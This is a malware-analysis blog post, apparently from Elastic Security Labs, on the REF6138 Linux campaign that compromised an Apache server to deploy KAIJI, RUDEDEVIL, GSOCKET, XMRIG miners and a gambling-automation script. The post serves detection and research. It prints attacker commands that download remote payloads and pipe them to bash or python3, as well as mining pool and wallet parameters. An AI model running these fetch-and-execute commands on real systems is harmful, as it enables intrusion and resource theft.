+ "document": "---\ntitle: \"Betting on Bots: Investigating Linux malware, crypto mining, and gambling API abuse\"\nslug: \"betting-on-bots\"\ndate: \"2024-09-27\"\ndescription: \"The REF6138 campaign involved cryptomining, DDoS attacks, and potential money laundering via gambling APIs, highlighting the attackers' use of evolving malware and stealthy communication channels.\"\nauthor:\n - slug: remco-sprooten\n - slug: ruben-groenewoud\nimage: \"betting-on-bots.jpg\"\ncategory:\n - slug: malware-analysis\n - slug: attack-pattern\ntags:\n - linux\n - kaiji\n - rudedevil\n - gsocket\n - cryptomining\n---\n\n## Introduction\n\nIn recent months, Elastic Security Labs has uncovered a sophisticated Linux malware campaign targeting vulnerable servers. The attackers initiated the compromise in March 2024 by exploiting an Apache2 web server. Gaining initial access the threat actors deployed a complex intrusion set to establish persistence and expand their control over the compromised host.\n\nThe threat actors utilized a mixture of tools and malware, including C2 channels disguised as kernel processes, telegram bots for communication, and cron jobs for scheduled task execution. Notably, they deployed multiple malware families, such as KAIJI and RUDEDEVIL, alongside custom-written malware. KAIJI, known for its DDoS capabilities, and RUDEDEVIL, a cryptocurrency miner, were used to exploit system resources for malicious purposes.\n\nOur investigation revealed a potential Bitcoin/XMR mining scheme that leverages gambling APIs, suggesting the attackers might be conducting money laundering activities using compromised hosts. We also gained access to a file share that hosted daily uploads of fresh KAIJI samples with previously unseen hashes, indicating active development and adaptation by the malware authors.\n\nThis research publication delves into the details of the campaign, providing a comprehensive analysis of the attackers' tactics, techniques, and procedures. We explore how they established initial access, the methods used for persistence and privilege escalation, and the malware deployed at each stage. Additionally, we discuss the command and control infrastructure, including the use of GSOCKET and Telegram for stealthy communication.\n\n## Execution flow\n\n### Initial access\n\nOur team observed a host that was initially compromised in March 2024 by obtaining arbitrary code execution on a server running Apache2. Evidence of this compromise is seen in the execution of the `id` command via the Apache2 process, after which we see the threat actor exploiting the web server and deploying KAIJI malware under the `www-data` user account.\n\nShortly after the Kaiji deployment, the attacker used the `www-data` account to download a script named `00.sh` from the URL `http://61.160.194[.]160:35130`, which, after further investigation, also hosted several versions of RUDEDEVIL malware.\n\n`00.sh` is a stager that:\n\n* Sets its default shell and PATH.\n* Deletes several log files to erase traces of execution.\n* Leverages `ps`, `netstat`, `lsof` and a list of common mining process names to kill any potential mining competition on the compromised host.\n* Flushes the `iptables` rules on the host, sets several `iptables` rules to block connections to specific destination ports and mining pools, and disables `iptables`.\n* Finally, a second stage (`sss6`/`sss68`) is downloaded and executed, and execution traces are erased.\n\nThe figure below shows a compressed version of the stager. Lines annotated with `[...]` are shortened to enhance readability. \n\n\n\n### Fileserver\n\nVia the backdoored web server process, the attacker downloaded and executed malware through the following command:\n\n```\nsh -c wget http://107.178.101[.]245:5488/l64;chmod 777 l64;./l64;rm -r l64;wget http://107.178.101[.]245:5488/l86;chmod 777 l86;./l86;rm -r l86\n```\n\nThe `l64` and `l86` files are downloaded from `http://107.178.101[.]245:5488`, after which they are granted all permissions, executed, and removed. Looking at the server that is hosting these malware samples, we see the following:\n\n\n\nThis seems to be a file server, hosting several types of malware for different architectures. The file server leverages the Rejetto technology. These malwares have upload dates and download counters. For example, the `download.sh` file that was uploaded September 10th, was already downloaded 3,100 times. \n\n\n\n### RUDEDEVIL/LUCIFER\n\nUpon closer inspection, the file `sss6`, which was downloaded and executed, has been identified as the RUDEDEVIL malware. Early in the execution process, we encounter an embedded message characteristic of this malware family:\n\n\n\n```\nHi, man. I\\'ve seen several organizations report my Trojan recently, \nPlease let me go. I want to buy a car. That\\'s all. I don\\'t want to hurt others. \nI can\\'t help it. My family is very poor. In China, it\\'s hard to buy a suite. \nI don\\'t have any accommodation. I don\\'t want to do anything illegal. \nReally, really, interested, you can give me XmR, my address is 42cjpfp1jJ6pxv4cbjxbbrmhp9yuzsxh6v5kevp7xzngklnutnzqvu9bhxsqbemstvdwymnsysietq5vubezyfoq4ft4ptc, \nthank yo\n```\n\nWe note that the files `l64` and `l86` that are hosted on the file server contain the same malware. When analyzing the execution flow of the malware we see that the main function of the malware performs several key tasks:\n\n* **Daemon Initialization:** The process is converted into a daemon using `daemon(1, 0)`.\n* **Socket Creation:** A socket is created and bound to a specific port.\n* **Signal Handling:** Custom signal handlers are set up for various signals.\n* **Service Initialization:** Several services are started using `SetFILE`.\n* **Privilege Handling:** It checks for root privileges and adjusts resource limits accordingly.\n* **Decryption:** The malware decrypts its configuration blobs.\n* **Thread Creation:** Multiple threads are spawned for tasks like mining, killing processes, and monitoring network and CPU usage.\n* **Main Loop:** The program enters an infinite loop where it repeatedly connects to a server and sleeps for a specified duration.\n\nWhen examining the encryption routine, we find it utilizes XOR-based encoding:\n\n\n\nTo decode the contents statically, we developed a basic Python snippet:\n\n``` python\ndef DecryptData(data_block, encryption_key):\n key_modifier = encryption_key & 0xFF\n key_index = key_modifier // 0x5F # 0x5F = 95 in decimal\n modifier = (key_modifier - (key_index * 0x5F)) + 0x58 # 0x58 = 88 in decimal\n\n for i in range(len(data_block)):\n data_block[i] ^= modifier\n data_block[i] &= 0xFF # Ensure 8-bit value\n data_block[i] += modifier\n data_block[i] &= 0xFF # Ensure 8-bit value\n\n return data_block\n\n# Encoded data as hex strings\nencoded_data = [\n '4c494356515049490c467978',\n '0d4f1e4342405142454d0b42534e380f0f5145424f0c53034e4f4f4a0c4f40573801393939391e0d451e020141303727222026254f252d372643400706314955032a593330233237587951215553552d464c0101414939514401515258414324273340254756564741404207004122782d50475555412d503106394d4c34554e48513926352054362a1e0d4e1e20',\n '0f424d4e0f435536575649484b',\n '5642424e380f0f5654430c42014a494c45460c534f4d38070602050f435352434356544b',\n]\n\nencryption_key = 0x03FF # 1023 in decimal\n\n# Process and decrypt each encoded data string\nfor data in encoded_data:\n # Convert hex string to list of integers\n data_bytes = bytes.fromhex(data)\n data_block = list(data_bytes)\n\n # Decrypt the data\n decrypted_block = DecryptData(data_block, encryption_key)\n\n # Convert decrypted data back to bytes\n decrypted_bytes = bytes(decrypted_block)\n print(\"Decrypted text:\", decrypted_bytes.decode('utf-8', errors='ignore'))\n```\n\nAfter decoding the configuration, the following values are revealed:\n\n* The first value C2 domain `nishabii[.]xyz`.\n* The second value reveals options that will be passed to XMRIG.\n* The third value shows the temp file location the malware uses.\n* The fourth and last string shows the download location for the XMRIG binary.\n\n### Thread Management in the Malware\n\nThe malware initiates several threads to handle its core operations. Let’s explore how some of these functions work in detail.\n\n#### Understanding the KillPid Function\n\nOne of the threads runs the KillPid function, which is designed to continuously monitor and manage processes. The function begins by detaching its current thread, allowing it to run in the background without blocking other processes. It then enters an infinite loop, repeatedly executing its tasks.\n\nAt the heart of its functionality is an array called `sb_name`, which contains the names of processes the malware wants to terminate. \n\n\n\nEvery two seconds, the function checks the system for processes listed in this array, retrieving their process IDs (PIDs) using a helper function called `getPidByName`. After each iteration, it moves to the next process in the list, ensuring all processes in `sb_name` are handled.\n\nInterestingly, after processing all elements in the array, the function enters an extended sleep for 600 seconds — roughly 10 minutes — before resuming its process checks. This extended sleep period is likely implemented to conserve system resources, ensuring the malware doesn't consume too much CPU time while monitoring processes.\n\n#### Understanding the Get_Net_Messages Function\n\nAnother crucial thread is responsible for monitoring network traffic, specifically focusing on the `eth0` network interface. This functionality is handled by the `getOutRates` function. The function begins by setting up necessary variables and opening the `/proc/net/dev` file, which contains detailed network statistics for each interface.\n\n\n\nIf the file is successfully opened, the malware reads a block of data — up to 1024 bytes — and processes it to extract the relevant network statistics. It specifically looks for the `eth0` interface, parsing the output rate data using a standard string parsing method. If successful, the function returns the output rate for `eth0`; otherwise, it returns `0`, ensuring the malware continues functioning even if an error occurs.\n\nThis routine allows the malware to quietly monitor the network activity of the infected machine, likely to track data being sent or received across the interface.\n\n#### Understanding the Get_Cpu_Message Function\n\nFor CPU monitoring, the malware uses the `GetCpuRates` function. This function continuously monitors the CPU usage by reading data from `/proc/stat`. Similar to how the network data is handled, the CPU statistics are read and parsed, allowing the malware to calculate the system's CPU usage.\n\n\n\nThe function operates in an infinite loop, sleeping for one second between each iteration to avoid overwhelming the system. If the file cannot be opened for some reason, the function logs an error and gracefully exits. However, as long as it’s able to read the file, it continually monitors CPU usage, ensuring the malware remains aware of system performance.\n\n#### Understanding the Send_Host_Message Function\n\nPerhaps the most critical thread is the one responsible for sending system information back to the malware operators. The `_SendInfo` function performs this task by collecting data about the infected system’s CPU and network usage. It begins by setting up buffers and preparing file paths to gather the necessary data. Depending on the system’s status, it formats the CPU and network usage into a string.\n\n\n\nAdditionally, the function checks whether a particular process is running on the system and adjusts its formatted message accordingly. Finally, it sends this formatted data back to the command-and-control server via a socket connection.\n\nIn essence, this function allows the malware to remotely monitor the infected machine, gathering key details like CPU load and network activity. The operators can use this information to assess the status of their infection and adjust their activities as needed.\n\n### Connecting to the Command-and-Control (C2) Server\n\nOnce all the threads are up and running, the malware shifts its focus to establishing a connection with its C2 server. This is managed by the `ConnectServer` function in the main thread, which handles communication with the server and executes commands remotely.\n\n#### Understanding the ConnectServer Function\n\nThe first task the `ConnectServer` function performs is establishing a connection to the C2 server using `ServerConnectCli`. After successfully connecting, the malware configures the socket to enable keep-alive settings, ensuring that the connection remains stable over extended periods of time.\n\nOnce the connection is set up, the malware collects various pieces of system information, including the hostname, user information, CPU specs, and memory details. This information is then sent to the server as an initial data payload, providing the attackers with a detailed view of the infected machine.\n\nAfter this initial setup, the malware enters an ongoing loop where it awaits and processes commands from the server. The types of commands handled are varied and can include tasks like launching a DDoS attack, stopping or starting CPU-intensive operations, executing system commands, or managing cryptocurrency mining activities. The loop continues indefinitely, ensuring that the malware is ready to execute any command sent by its operators.\n\nWhen the connection is no longer needed, or when the malware receives a termination command, it gracefully closes the socket, ending the session with the server.\n\n#### Command-and-Control (C2) Commands\n\nThe `ConnectServer` function processes a variety of commands from the C2 server, each designed to control a different aspect of the infected system. Here’s a breakdown of the commands handled by the malware:\n\n* **Case 4:** The malware calls the `DealwithDDoS` function, likely initiating a Distributed Denial of Service (DDoS) attack.\n* **Case 5:** Sets the `StopFlag` to `1`, which could signal the malware to stop specific tasks.\n* **Case 6:** Downloads a file from the server using `http_get`, changes its permissions, and then executes it. This command allows the attackers to run additional malware or scripts on the infected machine.\n* **Case 7:** Executes a system command using the `system` function, providing the attackers with direct control over the system’s command line.\n* **Case 8:** Sets `StopCpu` to `0`, restarting any previously halted CPU tasks.\n* **Case 9:** Sets `StopCpu` to `1`, halting all CPU tasks.\n* **Case 0xA:** Updates the CPU mining configuration with new data and retrieves the PID of the current process, allowing the malware to modify its cryptocurrency mining operations.\n* **Case 0xB:** Sets `stopxmr` to `1`, effectively stopping the XMRIG miner.\n* **Case 0xC:** Resets `stopxmr` to `0` and retrieves the current process PID, resuming the mining activity.\n\n\n\nEach command gives the malware operators precise control over how the infected machine behaves, whether it’s participating in a DDoS attack, running new malware, or managing mining operations.\n\n### Variants of RUDEDEVIL Malware and XMRIG Configuration\n\nWhile the file server mentioned before was active, we observed multiple versions of the RUDEDEVIL malware being uploaded. The core functionality of these versions remained largely the same, with the only significant variation being the embedded XMRIG commands used for cryptocurrency mining.\n\nEach version of the malware was configured to connect to the same mining pool, `c3pool.org`, but with slight differences in the parameters passed to the XMRIG miner:\n\n* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p R`\n* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p 2`\n* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 41qBGWTRXUoUMGXsr78Aie3LYCBSDGZyaQeceMxn11qi9av1adZqsVWCrUwhhwqrt72qTzMbweeqMbA89mnFepja9XERfHL -p php`\n* `-o stratum+tcp://auto.c3pool[.]org:19999 -u 42CJPfp1jJ6PXv4cbjXbBRMhp9YUZsXH6V5kEvp7XzNGKLnuTNZQVU9bhxsqBEMstvDwymNSysietQ5VubezYfoq4fT4Ptc -p 0`\n\nEach of these commands directs the miner to connect to the same mining pool but specifies different wallets or configurations. By examining the `c3pool` application, we confirmed that both XMR addresses associated with these commands are currently active and mining.\n\n\n\nAdditionally, through this analysis, we were able to estimate the total profit generated by these two mining campaigns, highlighting the financial impact of the RUDEDEVIL malware and its connection to illegal cryptocurrency mining operations.\n\n## GSOCKET\n\nTo establish persistence, the threat actor downloaded and installed [GSOCKET](https://github.com/hackerschoice/gsocket), a network utility designed to enable encrypted communication between machines that are behind firewalls or NAT. GSOCKET creates secure, persistent connections through the Global Socket Relay Network (GSRN). This open-source tool includes features like AES-256 encryption, support for end-to-end communication security, and compatibility with SSH, netcat, and TOR, which allow for encrypted file transfers, remote command execution, and even the creation of hidden services.\n\nAlthough GSOCKET is not inherently malicious, its features can be leveraged for suspicious purposes.\n\nOnce deployed, GSOCKET performs several actions to maintain persistence and conceal its presence. First, it checks the system for active kernel processes to decide which process it will masquerade as:\n\n\n\nIt then creates the `/dev/shm/.gs-1000` directory to download and store its binary in shared memory. Additionally, by default, it sets up an `/htop` directory under `/home/user/.config/htop/` to store both the GSOCKET binary and the secret key used for its operations. \n\nNext, a cron job that runs the GSOCKET binary with the secret key every minute is set up.\n\n\n\nThe binary is executed under the name of a kernel process using the `exec -a [process_name]` command, further enhancing the ability to evade detection. The cron job includes a base64 encoded command that, when decoded, ensures the persistence mechanism is regularly executed and disguised as a legitimate kernel process:\n\nWhen decoding the payload, we see how the `defunct.dat` secret key is used as an argument to execute the `defunct` binary, which is masqueraded as `[raid5wq]` through the use of `exec -a `command:\n\nIn addition to using cron jobs, GSOCKET has the capability to establish persistence through shell profile modification, run control (`rc.local`) and Systemd. GSOCKET enumerates potential persistence locations:\n\n\n\nGSOCKET supports multiple webhooks, such as Telegram or Discord integrations, enabling remote control and notifications:\n\n\n\nFinally, after installation, GSOCKET ensures that all files that are created or modified, will be timestomped to attempt to erase any trace of installation:\n\n\n\nThese features make GSOCKET an attractive tool for threat actors seeking stealth and persistence. In this campaign, GSOCKET was exploited to establish covert channels back to C2 servers while attempting to evade detection. \n\nAdditionally, a PHP payload was fetched from an external IP and saved as `404.php`, likely functioning as a backdoor for future access. We did not manage to obtain this payload.\n\n### Post compromise dwell time\n\nAfter a three-week period of quiet with no noticeable activity, the threat actors resumed operations by utilizing the built-in Python3 to establish a reverse connection to a new command-and-control server.\n\nAfter regaining access to the host, a newer version of the KAIJI malware was deployed.\n\n### KAIJI malware: a comparison to previous samples\n\nWhile investigating the files on the discovered file server, we saw a shell script. This shell script seems to be the main file used to download by an earlier stage, ensuring the correct architecture for the victim is used.\n\n\n\nThe same Shell script is found in other reports where this script is used to deploy KAIJI.\n\nAs part of our investigation, we analyzed the KAIJI malware samples found on the file server and compared them with samples identified by Black Lotus Labs in 2022. Their detailed analysis of `Chaos` (KAIJI) can be found in their blog post[ here](https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/).\n\nUsing [BinDiff](https://github.com/google/bindiff), a binary comparison tool, we compared the functions in the binaries. The analysis revealed that the code in our sample was identical to the previously identified KAIJI sample from 2022.\n\n\n\nAlthough the code was the same, one critical difference stood out: the C2 server address. Although the functionality remained consistent in both binaries, they pointed to different C2 domains.\n\nDelving deeper into the disassembly, we identified a function named `main_Link`. This function is responsible for decoding the C2 server address used by the malware.\n\n\n\nOnce decoded, the function searches for the `|(odk)/*-` postfix in the address and removes it, leaving only the C2 domain and port. This process ensures the malware can communicate with its C2 server, though the address it contacts may change between samples.\n\nGiven that some resources have been published that statically reverse engineer KAIJI, we will instead take a more detailed look at its behaviors.\n\n\n\nAfter execution, KAIJI creates several files in the `/etc/` and `/dev/` directories, `/etc/id.services.conf`, `/etc/32678`, `/dev/.img` and `/dev/.old`. These scripts are places to establish persistence. \n\nTwo services are set up, `/etc/init.d/linux_kill` and `crond.service`. `crond.service` is executed by Systemd, while `linux_kill` is used for SysVinit persistence.\n\nAfter reloading the Systemd daemon, the first network connection to the C2 is attempted.\n\n\n\nNext, the `Systemd Late generator` service file is created. More information on the workings of `Systemd`, and different ways of establishing persistence through this method can be found in our recent blog series dubbed [Linux Detection Engineering - A primer on persistence mechanisms](https://www.elastic.co/security-labs/primer-on-persistence-mechanisms).\n\nKAIJI creates the `/boot/System.img.config` file, which is an executable that is executed through the previously deployed `Systemd` services. This binary, is amongst other binaries, another way of establishing persistence. \n\n\n\nNext, KAIJI adjusts the `SELinux` policies to allow unauthorized actions. It searches audit logs for denied operations related to `System.img.conf`, generates a new `SELinux` policy to permit these actions, and installs the policy with elevated priority. By doing this, the malware bypasses security restrictions that would normally block its activity.\n\nAdditionally, it sets up multiple additional forms of persistence through bash profiles, and creates another two malicious artifacts; `/usr/lib/libd1rpcld.so` and `/.img`.\n\nRight after, `/etc/crontab` is altered through an echo command, ensuring that the `/.img` file is executed by root on a set schedule.\n\n\n\nKAIJI continues to move several default system binaries to unusual locations, attempting to evade detection along the way.\n\n\n\nKAIJI uses the `renice` command to grant PID `2957`, one of KAIJI's planted executables, the highest possible priority (on a scale of -20 to 19, lowest being the highest priority), ensuring it gets more CPU resources than other processes.\n\nTo evade detection, KAIJI employed the bind mount technique, a defense evasion method that obscures malicious activities by manipulating how directories are mounted and viewed within the system.\n\nFinally, we see a trace of `cron` executing the `/.img`, which was planted in the `/etc/crontab` file earlier.\n\n## The saga continues\n\nTwo weeks later, the Apache backdoor became active again. Another backdoor was downloaded via the `www-data` user through the Apache2 process using the command:\n\n```\nsh -c wget http://91.92.241[.]103:8002/gk.php\n```\n\nThe contents of this payload remain unknown. At this stage, we observed attempts at manual privilege escalation, with the attackers deploying `pspy64`. `Pspy` is a command-line tool for process snooping on Linux systems without requiring root permissions. It monitors running processes, including those initiated by other users, and captures events like cron job executions. This tool is particularly useful for analyzing system activity, spotting privilege escalation attempts, and auditing the commands and file system interactions triggered by processes in real time. It's commonly leveraged by attackers for reconnaissance in post-compromise scenarios, giving them visibility into system tasks and potential vulnerabilities.\n\nNotably, `pspy64` was executed by the `[rcu_preempt]` parent, indicating that the threat actors had transitioned from leveraging the web server backdoor to using the GSOCKET backdoor.\n\nFurther attempts at privilege escalation involved exploiting `CVE-2021-4034`, also known as `pwnkit`. This vulnerability affects the `pkexec` component of the PolicyKit package in Linux systems, allowing an unprivileged user to execute arbitrary code with root privileges. By leveraging this flaw, an attacker can gain elevated access to the system, potentially leading to full control over the affected machine.\n\n### Custom built binaries\n\nRight after, the attackers attempted to download a custom-built malware named `apache2` and `apache2v86` from:\n\n* `http://62.72.22[.]91/apache2`\n* `http://62.72.22[.]91/apache2v86`\n\nWe obtained copies of these files, which currently have zero detections on VirusTotal. However, when executing them dynamically, we observed segmentation faults, and our telemetry confirmed segfault activity on the compromised host. Over a week, the threat actor attempted to alter, upload and execute these binaries more than 15 times, but due to repeated segfaults, it is unlikely that they succeeded in running this custom malware.\n\nWhile the binaries failed to execute, they still provided valuable insights during reverse engineering. We uncovered several XOR-encoded strings within the samples.\n\n\n\nThe XOR key used to encode the strings was identified as `0x79` (or the character `y`). After decoding the strings, we discovered fragments of an HTTP request header that the malware was attempting to construct:\n\n```\n/934d9091-c90f-4edf-8b18-d44721ba2cdc HTTP/1.1\nsec-ch-ua: \"Chromium\";v=\"122\", \"Google Chrome\";v=\"122\", \"Not-A.Brand\";v=\"99\nsec-ch-ua-platform: \"Windows\"\nupgrade-insecure-requests: 1\naccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nreferer: https://twitter[.]com\naccept-language: ru,en-US;q=0.9\nMozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.\n```\n\nThis indicates that the malware was in the process of constructing HTTP requests. However, based on the incomplete nature of the headers and the repeated failures in execution, it’s clear that this piece of software was not yet fully developed or operational.\n\n### Additional reconnaissance \n\nThe attackers continued to use tools from The Hacker’s Choice, by downloading and executing [`whatserver.sh`](https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet/blob/master/tools/whatserver.sh).\n\nThis Shell script is designed to gather and display server information. It extracts details such as the fully qualified domain names (FQDNs) from SSL certificates, Nginx, and Apache configuration files, along with system resource information like CPU and memory usage, virtualization details, and network settings. The script can also summarize recent activities, including last logged-in users and currently listening services.\n\n### Mining activities\n\nAfter nearly two weeks of manual exploitation attempts, the threat actors ceased their efforts to escalate privileges, likely having failed to gain root access. Instead, they established persistence as the `www-data` user, leveraging GSOCKET to set up an SSL connection, which was disguised as a kernel process called `[mm_percpu_wq]`.\n\nAfter decoding the base64 contents, we get a very familiar looking output:\n\nThrough our behavioral rules, we see the threat actor listing the current user’s crontab entries, and echoing a payload directly into the crontab. \n\nThis command tries to download `http://gcp.pagaelrescate[.]com:8080/ifindyou` every minute, and pipe it to bash. Looking at the contents of `ifindyou`, we see the following Bash script:\n\n\n\nThis script gathers hostname and IP information, downloads the `SystemdXC` archive from `http://gcp.pagaelrescate[.]com:8080/t9r/SystemdXC` (XMRIG), stores this in `/tmp/SystemdXC`, extracts the archive and executes it with the necessary parameters to start mining Bitcoin.\n\nWhen examining the mining command, we can see how the malware configures XMRIG:\n\nThis command connects to the `unmineable.com` mining pool, using the infected machine’s hostname as an identifier in the mining process. At the time of writing, there are 15 active workers mining Bitcoin for the wallet address `1CSUkd5FZMis5NDauKLDkcpvvgV1zrBCBz`.\n\n\n\nUpon further investigation into the Bitcoin address, we found that this address has performed a single transaction.\n\n\n\nInterestingly, the output address for this transaction points to a well-known [hot wallet](https://www.ledger.com/academy/topics/security/hot-wallet-vs-cold-crypto-wallet-whats-the-difference) associated with Binance, indicating that the attackers may have transferred their mining earnings to an exchange platform.\n\n\n\nWhen returning our focus back to the script, we also see two commands commented out, which will become more clear later. The script executes:\n\n```\ncurl -s http://gcp.pagaelrescate[.]com:8080/cycnet | bash\n```\n\nLooking at this payload, we can see the following contents:\n\n\n\nThis stage checks the output of the command, and sends this to a Telegram chat bot. Through our Telegram behavioral rule, we can see that a Telegram POST request looks like this:\n\nThe cron job that is set up during this stage executes at minute 0, every 4th hour. This job executes:\n\n```\ncurl -s http://gcp.pagaelrescate[.]com:8080/testslot/enviador_slot | python3\n```\n\nThe downloaded Python script automates interactions with an online gambling game through HTTP requests. The script includes functions that handle user authentication, betting, processing the outcomes, and sending data to a remote server.\n\nUpon closer examination, we identified the following key components of the script:\n\n**Global Variables:**\n\n* `usuario`: Stores the user ID for managing the session.\n* `apuesta`: Represents the bet amount.\n* `ganancias`: Tracks the winnings and losses.\n* `saldo_actual`: Holds the current account balance.\n\n\n\n#### Understanding the `obteneruid` Function\n\nThis function authenticates the user by sending a POST request with the necessary headers and JSON data to the remote server. If the user is not already set, it initializes a new session and retrieves the account balance. Upon successful authentication, it returns a session UUID, which is used for further interactions in the game.\n\n\n\n\n#### Understanding the `enviardatos` Function\n\nThis function sends game data or status updates back to `gcp.pagaelrescate[.]com`, logging the results or actions taken during gameplay. It uses a simple GET request to transmit this data to the remote server.\n\n\n\n#### Understanding the `hacerjugada` Function\n\nThe `hacerjugada` function simulates the betting process for a set number of rounds. It sends POST requests to place bets, updates the winnings or losses after each round, and calculates the overall results. If a bonus round is triggered, it calls `completarbono()` to handle any bonus game details. Between each betting round, the function enforces a 30-second delay to mimic natural gameplay and avoid detection.\n\n\n\n#### Understanding the `completarbono` Function\n\nWhen a bonus round is triggered, this function completes the round by sending a request containing the session ID and round ID. Based on the result, it updates the account balance and logs the winnings or losses. Any change in the balance is sent back to the remote server using the `enviardatos()` function.\n\n\n\n#### Likely Used for Testing Purposes\n\nIt’s important to note that this script is likely being used for testing purposes, as it interacts with the demo version of the gambling app. This suggests that the attackers might be testing the automation of gambling actions or trying to find vulnerabilities in the app before moving to the live version. The use of a demo environment implies they are refining their approach, potentially in preparation for more sophisticated or widespread attacks.\n\n## REF6138 through MITRE ATT&CK\n\nElastic uses the [MITRE ATT&CK](https://attack.mitre.org/) framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks. During this investigation, we identified the following tactics, techniques and sub-techniques:\n\n*MITRE ATT&CK tactics, techniques and sub-techniques used*\n\n| Tactic | Technique | Sub-Technique |\n|----------------------|----------------------------------------------------|------------------------------------------------------------------------------------|\n| Resource Development | T1587: Develop Capabilities | Malware |\n| | T1588: Obtain Capabilities | Tool |\n| | T1608: Stage Capabilities | Upload Malware |\n| | | Upload Tool |\n| Initial Access | T1190: Exploit Public-Facing Application | |\n| Execution | T1059: Command and Scripting Interpreter | Unix Shell |\n| | | Python |\n| | T1053: Scheduled Task/Job | Cron |\n| Persistence | T1546: Event Triggered Execution | Unix Shell Configuration Modification |\n| | T1053: Scheduled Task/Job | Cron |\n| | T1505: Server Software Component | Web Shell |\n| Privilege Escalation | T1068: Exploitation for Privilege Escalation | |\n| Defense Evasion | T1140: Deobfuscate/Decode Files or Information | |\n| | T1222: File and Directory Permissions Modification | Linux and Mac File and Directory Permissions Modification |\n| | T1564: Hide Artifacts | Hidden Files and Directories |\n| | T1070: Indicator Removal | Timestomp |\n| | T1036: Masquerading | Masquerade Task or Service |\n| | T1027: Obfuscated Files or Information | Software Packing |\n| | | Stripped Payloads |\n| | | Command Obfuscation |\n| | | Encrypted/Encoded File |\n| Discovery | T1057: Process Discovery | |\n| | T1082: System Information Discovery | |\n| | T1061: System Network Configuration Discovery | |\n| | T1049: System Network Connections Discovery | |\n| | T1007: System Service Discovery | |\n| Collection | T1119: Automated Collection | |\n| | T1005: Data from Local System | |\n| Command and Control | T1071: Application Layer Protocol | Web Protocols |\n| | T1132: Data Encoding | Standard Encoding |\n| | T1001: Data Obfuscation | |\n| | T1573: Encrypted Channel | Symmetric Cryptography |\n| | T1105: Ingress Tool Transfer | |\n| | T1571: Non-Standard Port | |\n| | T1572: Protocol Tunneling | |\n| | T1102: Web Service | |\n| Impact | T1496: Resource Hijacking | |\n\n## **Detecting REF6138**\n\nElastic Security implements a multi-layer approach to threat detection, leveraging behavioral SIEM and Endpoint rules, YARA signatures and ML-based anomaly detection approaches. This section describes the detections built by Elastic Security that play a big role in capturing the identified threats.\n\n### Detection\n\nThe following detection rules were observed throughout the analysis of this intrusion set:\n\n* [Segfault Detection](https://github.com/elastic/detection-rules/blob/main/rules_building_block/execution_linux_segfault.toml)\n* [Timestomping using Touch Command](https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/defense_evasion_timestomp_touch.toml)\n* [Shell Configuration Creation or Modification](https://github.com/elastic/detection-rules/blob/main/rules/linux/persistence_shell_configuration_modification.toml)\n* [System Binary Moved or Copied](https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml)\n\n### Prevention\n\nThe following behavior prevention events were observed throughout the analysis of this intrusion set:\n\n* [Linux Reverse Shell via Suspicious Utility](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_linux_reverse_shell_via_suspicious_utility.toml)\n* [Defense Evasion via Bind Mount](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/defense_evasion_defense_evasion_via_bind_mount.toml)\n* [Linux Suspicious Child Process Execution via Interactive Shell](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_linux_suspicious_child_process_execution_via_interactive_shell.toml)\n* [Potential Linux Hack Tool Launched](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/execution_potential_linux_hack_tool_launched.toml)\n* [Privilege Escalation via PKEXEC Exploitation](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/privilege_escalation_privilege_escalation_via_pkexec_exploitation.toml)\n* [Potential SSH-IT SSH Worm Downloaded](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/lateral_movement_potential_ssh_it_ssh_worm_downloaded.toml)\n* [Scheduled Job Executing Binary in Unusual Location](https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/linux/persistence_scheduled_job_executing_binary_in_unusual_location.toml)\n\nThe following YARA Signatures are in place to detect the KAIJI and RUDEDEVIL malware samples both as file and in-memory:\n\n* [Linux.Generic.Threat](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Linux_Generic_Threat.yar)\n* [Linux.Hacktool.Flooder](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Linux_Hacktool_Flooder.yar)\n\nThe following, soon to be released, endpoint rule alerts were observed throughout the analysis of this intrusion set:\n\n* Potential Shell via Web Server\n* Potential Web Server Code Injection\n* Potential Shell Executed by Web Server User\n* Decode Activity via Web Server\n* Linux Telegram API Request\n* Suspicious Echo Execution\n\n### Hunting queries in Elastic\n\nThe events for both KQL and EQL are provided with the Elastic Agent using the Elastic Defend integration. Hunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.\n\n#### EQL queries\n\nUsing the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below EQL queries to hunt for behaviors similar:\n\n**Potential XMRIG Execution**\n\nThe following EQL query can be used to hunt for XMRIG executions within your environment.\n\n```\nprocess where event.type == \"start\" and event.action == \"exec\" and (\n (\n process.args in (\"-a\", \"--algo\") and process.args in (\n \"gr\", \"rx/graft\", \"cn/upx2\", \"argon2/chukwav2\", \"cn/ccx\", \"kawpow\", \"rx/keva\", \"cn-pico/tlo\", \"rx/sfx\", \"rx/arq\",\n \"rx/0\", \"argon2/chukwa\", \"argon2/ninja\", \"rx/wow\", \"cn/fast\", \"cn/rwz\", \"cn/zls\", \"cn/double\", \"cn/r\", \"cn-pico\",\n \"cn/half\", \"cn/2\", \"cn/xao\", 